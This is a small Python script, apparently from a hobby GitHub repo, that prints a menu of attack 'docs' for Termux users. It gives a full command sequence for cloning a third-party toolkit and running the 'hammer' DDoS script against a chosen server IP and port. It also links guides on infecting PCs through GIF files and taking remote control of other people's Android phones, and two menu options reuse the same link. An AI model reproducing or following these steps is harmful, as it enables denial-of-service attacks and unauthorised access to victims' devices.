print ("It was downloaded from https://github.com/UltroA/Docks")
print ("Hello %username%, it docs for you.")
print ("1. DDOS")
print ("2. Virus --> gif")
print ("3. Remote Android tool")
print ("4. Python virus")
what = input("What do u need?")

if what == "1":
	print()
	print ("TO start DDOS go to Website:")
	print ("https://telegra.ph/DDoS-ataka-na-sajt-pri-pomoshchi-Termux-08-21")
	print ("")
	print ("or write commands")
	print ("")
	print ("apt update")
	print ("apt upgrade")
	print ("apt install python")
	print ("apt install python2")
	print ("apt install git")
	print ("apt install php")
	print ("git clone https://github.com/Ranginang67/DarkFly-Tool")
	print ("cd DarkFly-Tool")
	print ("chmod +x install.py")
	print ("python2 install.py")
	print ("DarkFly")
	print ("1")
	print ("16")
	print ("")
	print ("restart console")
	print ("")
	print ("ls")
	print ("cd hammer")
	print ("python hammer.py")
	print ("python3 hammer.py [-s] [-p] [-t)")
	print ("P.S. -s : server ip -p : port default 80 -t : turbo default 135")
	end = input()
	
if what == "2":
	print ()
	print("For Do gif go to Website:")
	print ("https://telegra.ph/Zarazhenie-PK-s-pomoshchyu-GIF-08-10")
	end = input()
if what == "3":
	print ()
	print("For do ARMT Go to:")
	print ("https://tgraph.io/Polnyj-dostup-k-chuzhomu-Android-cherez-Termux-08-23-3")
	end = input()
if what == "4":
	print ()
	print("To create virus Go to:")
	print ("https://tgraph.io/Polnyj-dostup-k-chuzhomu-Android-cherez-Termux-08-23-3")
	end = input()
